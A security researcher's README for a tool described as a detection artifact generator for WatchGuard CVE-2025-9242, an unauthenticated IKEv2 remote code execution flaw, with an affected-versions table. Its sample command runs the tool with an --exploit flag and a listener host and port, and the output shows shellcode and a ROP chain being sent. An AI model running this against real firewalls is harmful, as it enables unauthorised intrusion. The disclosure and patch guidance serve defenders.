# watchTowr-vs-WatchGuard-CVE-2025-9242

Detection Artifact Generator for WatchGuard CVE-2025-9242

https://github.com/user-attachments/assets/097f099b-ba60-4223-adea-04279570460f

See our [blog post](https://labs.watchtowr.com/yikes-watchguard-fireware-os-ikev2-out-of-bounds-write-cve-2025-9242/) for technical details

# Detection in Action

```
python watchTowr-vs-WatchGuard-CVE-2025-9242.py --rhost 192.168.56.102 --rport 500 --lhost 192.168.56.1 --lport 31337 --exploit
                         __         ___  ___________
         __  _  ______ _/  |__ ____ |  |_\__    ____\____  _  ________
         \ \/ \/ \__  \    ___/ ___\|  |  \|    | /  _ \ \/ \/ \_  __ \
          \     / / __ \|  | \  \___|   Y  |    |(  <_> \     / |  | \/
           \/\_/ (____  |__|  \___  |___|__|__  | \__  / \/\_/  |__|
                                  \/          \/     \/

        watchTowr-vs-WatchGuard-CVE-2025-9242.py

        (*) WatchGuard Unauthenticated Remote Code Execution Detection Artifact Generator

          - McCaulay (@_mccaulay) of watchTowr (@watchTowrcyber)

        CVEs: [CVE-2025-9242]


[#] Sending IKEv2 SA Init with default transform
[#] WatchGuard Firmware Version: 12.11.3
[#] WatchGuard Build Number: 719894
[+] IKEv2 service is vulnerable to CVE-2025-9242 based on version number 12.11.3 < 12.11.4
[+] Default IKEv2 service found
[#] Verifying if IKEv2 service is vulnerable...
[+] IKEv2 service is vulnerable to CVE-2025-9242
[#] Building shellcode payload...
[#] Building ROP chain...
[#] Sending exploit payload to 192.168.56.1:31337
```

# Description

This script attempts to detect if WatchGuard OS is vulnerable to CVE-2025-9242.

# Affected Versions

The following versions of WatchGuard OS are Affected

| Vulnerable Version              | Resolved Version         |
| ------------------------------- | ------------------------ |
| 2025.1                          | 2025.1.1                 |
| 12.x                            | 12.11.4                  |
| 12.5.x (T15 & T35 models)       | 12.5.13                  |
| 12.3.1 (FIPS-certified release) | 12.3.1_Update3 (B722811) |
| 11.x                            | End of Life              |

For more information visit [WatchGuard Firebox iked Out of Bounds Write Vulnerability](https://www.watchguard.com/wgrd-psirt/advisory/wgsa-2025-00015)


# Follow [watchTowr](https://watchTowr.com) Labs

For the latest security research follow the [watchTowr](https://watchTowr.com) Labs Team 

- https://labs.watchtowr.com/

- https://x.com/watchtowrcyber